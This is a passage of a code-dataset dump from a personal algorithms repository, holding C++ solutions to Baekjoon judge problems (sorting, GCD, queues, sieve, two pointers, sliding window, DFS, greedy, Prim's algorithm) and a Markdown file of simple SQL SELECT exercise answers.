"repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1181번: 단어 정렬\nDATE: 2021-04-29\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<pair<int, string>> v;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n string str;\n cin >> str;\n v.push_back(make_pair(str.length(), str));\n }\n\n sort(v.begin(), v.end());\n v.erase(unique(v.begin(), v.end()), v.end()); \n\n for(int i = 0 ; i < v.size() ; i++){\n cout << v[i].second << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4153132140636444, "alphanum_fraction": 0.45475637912750244, "avg_line_length": 14.428571701049805, "blob_id": "bc5875c6809b1a3ccdb3d727e488a65c28ec5f49", "content_id": "26b819a3ac3204940201b782a000d2b8eaf64208", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 439, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/BOJ/Mathematics/1735.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1735번: 분수 합\nDATE: 2022-03-16\n*/\n#include <iostream>\nusing namespace std;\n\nint gcd(int n, int m){\n if(m == 0) return n;\n else return gcd(m, n % m);\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b, c, d;\n int n, m;\n \n cin >> a >> b >> c >> d;\n \n n = a * d + b * c;\n m = b * d;\n\n int div = gcd(n, m);\n\n cout << n / div << \" \" << m / div;\n \n return 0;\n}" }, { "alpha_fraction": 0.3262890875339508, "alphanum_fraction": 0.34234994649887085, "avg_line_length": 20.527273178100586, "blob_id": "f267eb75547bed8f8a1d671c3367d30031430e3c", "content_id": "a31835b108b27521c552cd9bf4e3270757e904f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1211, "license_type": "no_license", "max_line_length": 58, "num_lines": 55, "path": "/BOJ/Implementation/1966.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1966번: 프린터 큐\n2021-10-14\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int tc, n, m, num;\n cin >> tc;\n\n for(int i = 0 ; i < tc ; i++) {\n queue<pair<int,int>> q;\n priority_queue<int> pq;\n int order = 1, idx;\n\n cin >> n >> m;\n\n for(int j = 0 ; j < n ; j++) {\n cin >> num;\n q.push(make_pair(num, j)); // 중요도, 순서\n pq.push(num);\n\n if(j == m) idx = j; // 목표 문서\n }\n\n int max = pq.top();\n\n while(!q.empty()) {\n pair<int, int> cur = q.front();\n\n if(cur.first < max) {\n while(cur.first != max) {\n q.push(q.front()); q.pop();\n cur = q.front();\n }\n }\n else {\n if(cur.second == idx) {\n cout << order << '\\n';\n break;\n }\n else {\n q.pop(); pq.pop();\n max = pq.top();\n order++;\n }\n }\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.37987011671066284, "alphanum_fraction": 0.4253246784210205, "avg_line_length": 16.13888931274414, "blob_id": "0209841caccc6e521050f001afc054b425e44388", "content_id": "1dcbc4a8c693b653297414c960f312f9e1d3faa1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 626, "license_type": "no_license", "max_line_length": 69, "num_lines": 36, "path": "/BOJ/Mathematics/15965.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15965번: K번째 소수\n2022-01-29\n*/\n#include <iostream>\n#include <math.h>\n#define MAX 7400000\nusing namespace std;\n\nint 
isNotPrime[MAX];\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int k, cnt = 0;\n cin >> k;\n\n for(int i = 2 ; i <= sqrt(MAX) ; i++) {\n if(!isNotPrime[i]) {\n for(int j = i * i ; j <= MAX ; j += i) isNotPrime[j] = 1;\n }\n }\n\n for(int i = 2 ; i <= MAX ; i++) {\n if(!isNotPrime[i]) {\n cnt++;\n\n if(cnt == k) {\n cout << i;\n break;\n }\n }\n }\n\n\n return 0;\n}" }, { "alpha_fraction": 0.380952388048172, "alphanum_fraction": 0.4238095283508301, "avg_line_length": 14.774999618530273, "blob_id": "b2f79c2cb4818a919ce21715985a9ae16f662bbb", "content_id": "0ba70e4d5171db341101d7882072effc1939a41d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 640, "license_type": "no_license", "max_line_length": 58, "num_lines": 40, "path": "/BOJ/Two Pointer/2003.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2003번: 수들의 합 2\nDATE: 2021-06-01\nTwo Pointer\n*/\n#include <iostream>\n#define MAX 10001\nusing namespace std;\n\nint arr[MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int start=0, end=0, sum=0, answer=0;\n int n, m;\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n \n while(end <= n){\n if(sum < m){\n sum += arr[end];\n end++;\n }\n else if(sum >= m){\n sum -= arr[start];\n start++;\n }\n\n if(sum == m){\n answer++;\n }\n }\n\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.4124087691307068, "alphanum_fraction": 0.45985400676727295, "avg_line_length": 16.510639190673828, "blob_id": "ba82e3cb497d95bbe9bdb07ef91c8cd5b8bc898c", "content_id": "dede551a744fffa4b39c9f02a80253afc8fc5703", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 832, "license_type": "no_license", "max_line_length": 58, "num_lines": 47, "path": "/BOJ/Sliding Window/15961.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15961번: 회전 초밥\nDATE: 2021-08-03\nSliding Window\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint arr[3000001];\nint sushi[3001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, d, k, c, cnt=0, ans=-1;\n int start, end, total;\n cin >> n >> d >> k >> c;\n\n for(int i = 0 ; i < n ; i++)\n cin >> arr[i];\n for(int i = 0 ; i < k ; i++){\n sushi[arr[i]]++;\n if(sushi[arr[i]] == 1) cnt++;\n }\n\n if(++sushi[c] == 1) cnt++;\n\n start = 0;\n end = k - 1;\n\n while(start < n){\n ans = max(ans, cnt);\n end = (end + 1) % n;\n\n sushi[arr[start]]--;\n if(sushi[arr[start]] == 0) cnt--;\n\n sushi[arr[end]]++;\n if(sushi[arr[end]] == 1) cnt++;\n\n start++;\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.6295694708824158, "alphanum_fraction": 0.681559681892395, "avg_line_length": 16.338027954101562, "blob_id": "dd0715e8c9b6c2a3db30d8c1d553fd320b04357b", "content_id": "1aa72ea846820fcd45a9662c2f0a0c056628cdcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1335, "license_type": "no_license", "max_line_length": 89, "num_lines": 71, "path": "/programmers/SQL/SELECT.md", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# SELECT\n\n**[1. 모든 레코드 조회하기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59034)**\n\n```sql\nSELECT *\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[2. 
역순 정렬하기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59035)**\n\n```sql\nSELECT NAME, DATETIME\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID DESC\n```\n\n<br/>\n\n**[3. 아픈 동물 찾기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59036)**\n\n```sql\nSELECT ANIMAL_ID, NAME\nFROM ANIMAL_INS\nWHERE INTAKE_CONDITION = 'SICK'\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[4. 어린 동물 찾기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59037)**\n\n```sql\nSELECT ANIMAL_ID, NAME FROM ANIMAL_INS\nWHERE INTAKE_CONDITION != 'Aged'\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[5. 동물의 아이디와 이름 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59403)**\n\n```sql\nSELECT ANIMAL_ID, NAME\nFROM ANIMAL_INS\nORDER BY ANIMAL_ID\n```\n\n<br/>\n\n**[6. 여러 기준으로 정렬하기 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59404)**\n\n```sql\nSELECT ANIMAL_ID, NAME, DATETIME\nFROM ANIMAL_INS\nORDER BY NAME, DATETIME DESC\n```\n\n<br/>\n\n**[7. 상위 n개 레코드 (Level 1)](https://programmers.co.kr/learn/courses/30/lessons/59405)**\n\n```sql\nSELECT NAME\nFROM ANIMAL_INS\nORDER BY DATETIME\nLIMIT 1\n```\n" }, { "alpha_fraction": 0.42227378487586975, "alphanum_fraction": 0.4617169499397278, "avg_line_length": 16.97916603088379, "blob_id": "f6ac31649aa827bf5fd420da0af9a27484847e3d", "content_id": "57b2d478985c1fffbcc331f6a46dd15e5db2f48d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 872, "license_type": "no_license", "max_line_length": 58, "num_lines": 48, "path": "/BOJ/BFS_DFS/15900.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15900번: 나무 탈출\nDATE: 2021-09-10\nDFS\n*/\n#include <iostream>\n#include <vector>\n#define MAX 500001\nusing namespace std;\n\nint n, total=0;\nvector<int> v[MAX];\nint visited[MAX];\n\nvoid dfs(int node, int depth){\n visited[node] = true;\n\n if(node != 1 && v[node].size() == 1){ //leaf node\n total += depth;\n }\n else {\n for(int i = 0 ; i < v[node].size() ; i++){\n if(!visited[v[node][i]]){\n dfs(v[node][i], depth + 1);\n visited[v[node][i]] = false;\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int a, b;\n cin >> n;\n\n for(int i = 0 ; i < n - 1 ; i++){\n cin >> a >> b;\n v[a].push_back(b);\n v[b].push_back(a);\n }\n\n dfs(1, 0);\n\n if(total % 2 == 0) cout << \"No\\n\";\n else cout << \"Yes\\n\";\n\n return 0;\n}" }, { "alpha_fraction": 0.43296703696250916, "alphanum_fraction": 0.4879120886325836, "avg_line_length": 14.199999809265137, "blob_id": "d6e644cad9a3d12a2fb252860208a1a702d37406", "content_id": "6f4b35d5faef458bc1119d171ae98a3315802e6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 505, "license_type": "no_license", "max_line_length": 55, "num_lines": 30, "path": "/BOJ/Greedy/11047.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 11047번: 동전 0\nDATE: 2021-01-10\n*/\n#include <iostream>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\tint n, k, val, cnt=0;\n\tint arr[10];\n\n\tcin >> n >> k;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tcin >> val;\n\t\tarr[i] = val;\n\t}\n\n\tfor (int i = n-1 ; i >= 0; i--) {\n\t\tif (k / arr[i] > 0) { //몫이 양수이면\n\t\t\tcnt += k / arr[i]; //동전 개수 더함\n\t\t\tk -= arr[i] * (k / arr[i]); //위에서 더한 값만큼 빼줌\n\t\t}\n\t}\n\n\tcout << cnt;\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.470703125, "alphanum_fraction": 0.4970703125, "avg_line_length": 17.636363983154297, 
"blob_id": "30b143ae8a82ee22f37874e522d2f291f8ca6936", "content_id": "c2c688fe0c56e0085c6a63c9211253925f656a56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1034, "license_type": "no_license", "max_line_length": 68, "num_lines": 55, "path": "/BOJ/MST/16398.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16398번: 행성 연결\nDATE: 2022-03-02\nPrim Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 1001\n#define pii pair<int,int>\nusing namespace std;\n\nvector<pii> edge[MAX];\nbool visited[MAX];\n\nlong long prim(){\n long long ans = 0;\n priority_queue<pii, vector<pii>, greater<pii>> pq;\n pq.push({0, 1});\n \n while(!pq.empty()){\n int dis = pq.top().first;\n int cur = pq.top().second;\n pq.pop();\n\n if(visited[cur]) continue;\n visited[cur] = true;\n ans += dis;\n\n for(int i = 0 ; i < edge[cur].size() ; i++){\n if(!visited[edge[cur][i].second]) pq.push(edge[cur][i]);\n }\n }\n\n return ans;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num;\n cin >> n;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n cin >> num;\n\n if(i == j) continue;\n edge[i].push_back({num, j});\n }\n }\n\n cout << prim();\n\n return 0;\n}" }, { "alpha_fraction": 0.39371258020401, "alphanum_fraction": 0.428143709897995, "avg_line_length": 17.58333396911621, "blob_id": "978ceeb65f295e11400e49cc2ca0f0021b856216", "content_id": "87ef34ef43ae724fc88bf0644de349146e0a0ce2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 678, "license_type": "no_license", "max_line_length": 58, "num_lines": 36, "path": "/BOJ/Brute Force/1543.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1543번: 문서 검색\nDATE: 2021-04-04\n*/\n#include <iostream>\n#include <string>\n\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int cnt = 0, ans=0;\n string str, search;\n\n getline(cin, str);\n getline(cin, search);\n\n for(int i = 0 ; i < str.size() ; i++){\n if(str[i] == search[0]){\n for(int j = 0 ; j < search.size() ; j++){\n if(str[i++] == search[j]) cnt++;\n }\n\n if(cnt == search.size()){\n ans++;\n i -= 1;\n }\n else i -= search.size();\n }\n cnt = 0;\n }\n\n cout << ans;\n\n return 0;\n}" } ]
270
roydulal/Flask_Heruku_Pipline
https://github.com/roydulal/Flask_Heruku_Pipline
e6f2802d396fbfd8457c9de09b6edd636599a599
595142d782610a9d0ab90e3f6e1db8b147388b9e
89025ad6e7390070bb299541f36c5873b4aeedcc
refs/heads/master
2021-01-26T09:16:04.450380
2020-02-27T01:59:54
2020-02-27T01:59:54
243,400,534
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6158536672592163, "alphanum_fraction": 0.6158536672592163, "avg_line_length": 22.571428298950195, "blob_id": "f720187696e3d1fa955082a4d5b4c327244f9879", "content_id": "1c925cfc25944f708515bfcf374a0ebdd8635c20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 164, "license_type": "no_license", "max_line_length": 32, "num_lines": 7, "path": "/app.py", "repo_name": "roydulal/Flask_Heruku_Pipline", "src_encoding": "UTF-8", "text": "from flask import Flask\napp =Flask(__name__)\[email protected](\"/\")\ndef index():\n return \"My fast Flask setup\"\nif __name__ == \"__main__\":\n app.run(use_reloader=True)" } ]
1
Shivansh001/Pocket_Dictionary-using-Python
https://github.com/Shivansh001/Pocket_Dictionary-using-Python
a84177aceea570386d2ed65c253345e44a8af464
69912c9283c34b87db6904fda423efb04aecfc6a
6a6fe232f257d529e5e462ea3581496f92aca077
refs/heads/main
2023-02-03T03:46:34.471679
2020-12-27T18:54:21
2020-12-27T18:54:21
324,828,002
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8074073791503906, "alphanum_fraction": 0.8074073791503906, "avg_line_length": 66.5, "blob_id": "69e64d994987c54d4e886dbdf4ccf3232977eacf", "content_id": "10ad4e634753d3eba7dfd7efbef694e3a11adc63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 135, "license_type": "no_license", "max_line_length": 101, "num_lines": 2, "path": "/README.md", "repo_name": "Shivansh001/Pocket_Dictionary-using-Python", "src_encoding": "UTF-8", "text": "# Pocket_Dictionary-using-Python\nIt's an amazing tool to find the meaning of any word directly with the help of this pocket dictionary\n" }, { "alpha_fraction": 0.7601810097694397, "alphanum_fraction": 0.7601810097694397, "avg_line_length": 22.55555534362793, "blob_id": "8b294d5e668f33c753a4b4852dade84dfc301116", "content_id": "f7068deb8e7f5eccaf587922f68aa3b8da9f335d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "no_license", "max_line_length": 55, "num_lines": 9, "path": "/pocketdict.py", "repo_name": "Shivansh001/Pocket_Dictionary-using-Python", "src_encoding": "UTF-8", "text": "#to make a pocket dictonary in python we can use\r\n#pyDictionary\r\n#pip install Dictionary\r\n\r\nfrom PyDictionary import PyDictionary\r\n\r\ndictionary = PyDictionary()\r\n\r\nprint(dictionary.meaning(input(\"Enter the keyword: \")))\r\n" } ]
2
Barbiero/PythonMenu
https://github.com/Barbiero/PythonMenu
809a50c9163b127eab5647749f31a68b0ed30329
ecfa7acc4440ab426edd1381940ed4f3a72b211d
7aec6d7af587663ee7356fb6518778c889a09fd2
refs/heads/master
2016-09-07T20:34:40.137231
2014-02-27T01:41:12
2014-02-27T01:41:12
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7755101919174194, "alphanum_fraction": 0.7755101919174194, "avg_line_length": 35.75, "blob_id": "128285beeec03c028563f82a68feca8d23927fba", "content_id": "b4b18ae0cb32514b4985a4fb1dfd1d99f962142a", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 147, "license_type": "permissive", "max_line_length": 123, "num_lines": 4, "path": "/README.md", "repo_name": "Barbiero/PythonMenu", "src_encoding": "UTF-8", "text": "PythonMenu\n==========\n\nLibrary to create simple Python menus that execute certain functions. Drastically reduces written code on the main program.\n" }, { "alpha_fraction": 0.529411792755127, "alphanum_fraction": 0.5353335738182068, "avg_line_length": 28.799999237060547, "blob_id": "56c3bb6bf68dd2beacf107f760d9130a6da101ea", "content_id": "d13202209cf85facaa8c740686a4185ad0c27808", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2533, "license_type": "permissive", "max_line_length": 116, "num_lines": 85, "path": "/menu.py", "repo_name": "Barbiero/PythonMenu", "src_encoding": "UTF-8", "text": "'''\nSimple menu system for python\nusage:\n\nm = Menu([menu title])\nm.addMenuOption(<option description>, [Function, [{arguments}]])\n(add more options as you wish)\nm.run()\n\nEach option can be associated to a Function.\nIn case the Function isn't callable, chosing that option will close the Menu. and proceed with anything past m.run()\n\n\n'''\n\nclass Menu:\n __name = ''\n maxlen = 0\n __options = []\n\n def __init__(self, name='OPTIONS MENU'):\n self.__name = name\n self.maxlen = len(self.__name)+2\n self.addMenuOption(\"Leave\")\n\n def getMenuSize(self):\n return len(self.__options)\n\n def getOptionLen(self, index):\n if(self.getMenuSize() > 9):\n return len(self.__options[index][0])+6\n\n return len(self.__options[index][0])+5\n \n def addMenuOption(self, descr, func=None, args={}):\n if(not isinstance(descr, str)):\n raise ValueError('Menu description must be a string.')\n\n\n T = (descr, (func, args))\n \n self.__options.append(T)\n index = self.__options.index(T)\n \n if(self.maxlen < self.getOptionLen(index)):\n self.maxlen = self.getOptionLen(index)\n\n def remMenuOption(self, index):\n if(not isinstance(index, int)):\n raise ValueError('Index must be an integer')\n\n if(self.getMenuSize() < index):\n raise IndexError('Index out of range')\n\n if(self.maxlen == self.getOptionLen(index)):\n self.maxlen = len(self.__name)+2\n for i in range(len(self.__options)):\n if i != index and self.maxlen < self.getOptionLen(i):\n self.maxlen = self.getOptionLen(i)\n\n self.__options.pop(index)\n\n def __str__(self):\n width = self.maxlen+2\n STR = '{:*^{w}}\\n*{: ^{self.maxlen}}*\\n{:*^{w}}\\n'.format('',self.__name,'',self=self, w=width)\n for i in range(self.getMenuSize()):\n opt_str = '*{: <{self.maxlen}}*\\n'.format('%d - %s' % (i, self.__options[i][0]), self=self)\n STR = STR + opt_str\n\n return STR + '{:*^{w}}'.format('', w=width)\n\n\n def run(self, optmsg='Choose an option: '):\n while True:\n print(self)\n opt = input(optmsg)\n opt = int(opt)\n if opt in range(0,self.getMenuSize()):\n f = self.__options[opt][1][0]\n if(not callable(f)):\n break\n arg = self.__options[opt][1][1]\n f(*arg)\n else:\n break\n" } ]
2
hughed2/django_teams
https://github.com/hughed2/django_teams
df60e8b1f21a16825b0b1a54e74a6a153dfd549a
011a16feed52bbe78cc1e5586d1cccf937689a26
99c1cea26abbd9c3747a501283a5a25d843ee5be
refs/heads/master
2020-12-26T02:38:59.905401
2015-04-29T05:53:30
2015-04-29T05:53:30
34,774,300
0
0
null
2015-04-29T05:32:24
2014-12-23T16:03:42
2014-12-23T16:03:42
null
[ { "alpha_fraction": 0.5974366664886475, "alphanum_fraction": 0.6012234091758728, "avg_line_length": 41.912498474121094, "blob_id": "c54f944ea6747342a0b03148c4bc3c7e51741432", "content_id": "9e21b7ecb5a8f3b379b6f6cf1313d8233bbbd5f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3433, "license_type": "no_license", "max_line_length": 128, "num_lines": 80, "path": "/django_teams/forms.py", "repo_name": "hughed2/django_teams", "src_encoding": "UTF-8", "text": "from django.forms import ModelForm, widgets\nfrom django import forms\nfrom django.utils.html import format_html\nfrom itertools import chain\nfrom django_teams.models import Team\nfrom django.utils.safestring import mark_safe\nfrom django.utils.encoding import force_text\n\nclass TeamCreateForm(ModelForm):\n class Meta:\n model = Team\n\nclass TeamEditForm(ModelForm):\n \"\"\"This form is very complicated;\n it consists of a hash containing :\n An array of pending requests\n An array of team leaders\n An array of team members\n The form should allow the team leaders to perform the following\n actions on any number of elements from each array, at the same time:\n Pending requests;\n approve\n deny\n Team Leaders\n Demote\n Remove\n Team Members\n Promote\n Remove\n \"\"\"\n\n class Meta:\n model = Team\n \nclass LinkedCheckboxSelectMultiple (widgets.CheckboxSelectMultiple):\n def render(self, name, value, attrs=None, choices=()):\n if value is None: value = []\n has_id = attrs and 'id' in attrs\n final_attrs = self.build_attrs(attrs, name=name)\n output = ['<ul>']\n # Normalize to strings\n str_values = set([force_text(v) for v in value])\n for i, (option_value, option_label) in enumerate(chain(self.choices, choices)):\n # If an ID attribute was given, add a numeric index as a suffix,\n # so that the checkboxes don't all have the same ID attribute.\n if has_id:\n final_attrs = dict(final_attrs, id='%s_%s' % (attrs['id'], i))\n label_for = format_html(' for=\"{0}\"', final_attrs['id'])\n else:\n label_for = ''\n\n cb = widgets.CheckboxInput(final_attrs, check_test=lambda value: value in str_values)\n option_value = force_text(option_value)\n rendered_cb = cb.render(name, option_value)\n text = option_label.split('/',3)\n if len(text) == 4 : # If we got a proper split\n obj_model = text[0]\n obj_id = text[1]\n option_label = force_text(text[3] + \" by \" + text[2]) # Project Name by Student\n output.append(format_html('<li><label{0}>{1} <a href=\"/' + obj_model + 's/' + obj_id + '/\">{2}</a></label></li>',\n label_for, rendered_cb, option_label))\n else: # Default to normal behavior without proper split\n option_label = force_text(option_label)\n output.append(format_html('<li><label{0}>{1} {2}</label></li>',\n label_for, rendered_cb, option_label))\n output.append('</ul>')\n return mark_safe('\\n'.join(output))\n\ndef action_formset(qset, actions, link=False):\n \"\"\"A form factory which returns a form which allows the user to pick a specific action to\n perform on a chosen subset of items from a queryset.\n \"\"\"\n class _ActionForm(forms.Form):\n if(link):\n items = forms.ModelMultipleChoiceField(queryset = qset, required=False, widget=LinkedCheckboxSelectMultiple)\n else: \n items = forms.ModelMultipleChoiceField(queryset = qset, required=False, widget=widgets.CheckboxSelectMultiple)\n action = forms.ChoiceField(choices = zip(actions, actions), required=False)\n\n return _ActionForm\n" }, { "alpha_fraction": 0.7055837512016296, "alphanum_fraction": 0.7055837512016296, 
"avg_line_length": 24.69565200805664, "blob_id": "8d7395e0aaf76e9d28d03986a7e8a1fa1eb0d90d", "content_id": "d250d633916c505aa9d25ed63802436ad67fa273", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 591, "license_type": "no_license", "max_line_length": 53, "num_lines": 23, "path": "/django_teams/tests/test_decorators.py", "repo_name": "hughed2/django_teams", "src_encoding": "UTF-8", "text": "from time import sleep\nimport sys\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.test.client import RequestFactory\n\nfrom django_teams.decorators import teamify\n\nclass DecoratorTests(TestCase):\n fixtures = ['test_data.json']\n\n def setUp(self):\n self.factory = RequestFactory()\n\n def test_can_import_without_errors(self):\n # If we can get this far, we passed this test\n pass\n\n def test_view(self):\n def view(request):\n pass\n teamify(view)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 39.13793182373047, "blob_id": "746fdd7bd3b51e8a00fe485ef44c92a39d1be853", "content_id": "5a7edf3f3c6e6b69fb575a4ce932eda87a79083e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1164, "license_type": "no_license", "max_line_length": 118, "num_lines": 29, "path": "/django_teams/urls.py", "repo_name": "hughed2/django_teams", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.decorators import login_required\nfrom django.conf import settings\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom django_teams.views import *\n\nurlpatterns = patterns('',\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n url(r'^admin/', include(admin.site.urls)),\n\n # TemplateView + Login\n #url(r'^$', login_required(TemplateView.as_view(template_name=\"home.html\")), {}, 'home'),\n url(r'^teams/$', TeamListView.as_view(), name='team-list'),\n url(r'^teams/create$', login_required(TeamCreateView.as_view()), name='team-create'),\n url(r'^teams/(?P<team_pk>\\d+)/invite$', login_required(TeamStatusCreateView.as_view()), name='teamstatus-create'),\n url(r'^teams/(?P<pk>\\d+)/$', TeamDetailView.as_view(), name='team-detail'),\n url(r'^teams/(?P<pk>\\d+)/edit$', TeamEditView.as_view(), name='team-edit'),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('',\n url(r'^media/(?P<path>.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n )\n" }, { "alpha_fraction": 0.647219181060791, "alphanum_fraction": 0.6594874858856201, "avg_line_length": 32.65137481689453, "blob_id": "0f31bbaca3be6b4b89ae20c52cd18d0716515190", "content_id": "b567b7a0e78dbcace829640a66be1cb578157fa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3668, "license_type": "no_license", "max_line_length": 98, "num_lines": 109, "path": "/django_teams/tests/test_override.py", "repo_name": "hughed2/django_teams", "src_encoding": "UTF-8", "text": "from time import sleep\nimport sys\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom django_teams.models import override_manager, revert_manager, Team, TeamStatus, Ownership\nfrom django.contrib.sites.models import Site\n\nclass 
OwnershipTests(TestCase):\n fixtures = ['test_data.json']\n\n def tearDown(self):\n revert_manager(Site)\n\n def test_overriding_queryset_no_errors(self):\n import django_teams.models\n django_teams.models.CurrentUser = None\n django_teams.models.CurrentTeam = None\n override_manager(User)\n User.objects.all()\n\n # If there are no errors, we should be good.. Revert\n revert_manager(User)\n\n def test_can_override_sites(self):\n \"\"\"\n Attempts to override the sites framework so that we can only query sites we own\n - This is only a proof-of-concept test, as I don't want to include another app for testing\n \"\"\"\n # Set the current User\n import django_teams.models\n django_teams.models.CurrentUser = User.objects.get(pk=1)\n\n self.assertEqual(Site.objects.all().count(), 3)\n override_manager(Site)\n\n self.assertEqual(Site.objects.all().count(), 0)\n\n def test_can_gain_access(self):\n import django_teams.models\n django_teams.models.CurrentUser = User.objects.get(pk=1)\n\n self.assertEqual(Site.objects.all().count(), 3)\n site = Site.objects.get(pk=1)\n override_manager(Site)\n\n # Try granting the user access to one site\n team = Team(name=\"Team awesome\")\n team.save()\n\n team.add_user(django_teams.models.CurrentUser, team_role=20)\n\n Ownership.grant_ownership(team, site)\n\n self.assertEqual(Site.objects.all().count(), 1)\n\n def test_default_team_hides_objects(self):\n import django_teams.models\n django_teams.models.CurrentUser = User.objects.get(pk=1)\n\n Team.objects.all().delete()\n Ownership.objects.all().delete()\n TeamStatus.objects.all().delete()\n\n team1 = Team(name=\"Team Mtn Dew\")\n team1.save()\n team1.add_user(django_teams.models.CurrentUser, team_role=20)\n team2 = Team(name=\"Team ROFLCAT\")\n team2.save()\n team2.add_user(django_teams.models.CurrentUser, team_role=20)\n\n site1 = Site.objects.get(pk=2)\n Ownership.grant_ownership(team1, site1)\n site2 = Site.objects.get(pk=3)\n Ownership.grant_ownership(team2, site2)\n\n django_teams.models.CurrentTeam = team2\n\n override_manager(Site)\n\n site_test = Site.objects.get(pk=3)\n self.assertEqual(site_test, site2)\n\n self.assertEqual(Site.objects.all().count(), 1)\n self.assertEqual(Site.objects.all()[0].id, 3)\n self.assertEqual(Site.objects.all()[0], site2)\n\n django_teams.models.CurrentUser = None\n django_teams.models.CurrentTeam = None\n\n def test_removing_non_restricted_doesnt_crash_things(self):\n revert_manager(Team)\n\n def test_restricted_related_managers(self):\n # If we override the user, we should have no access to any 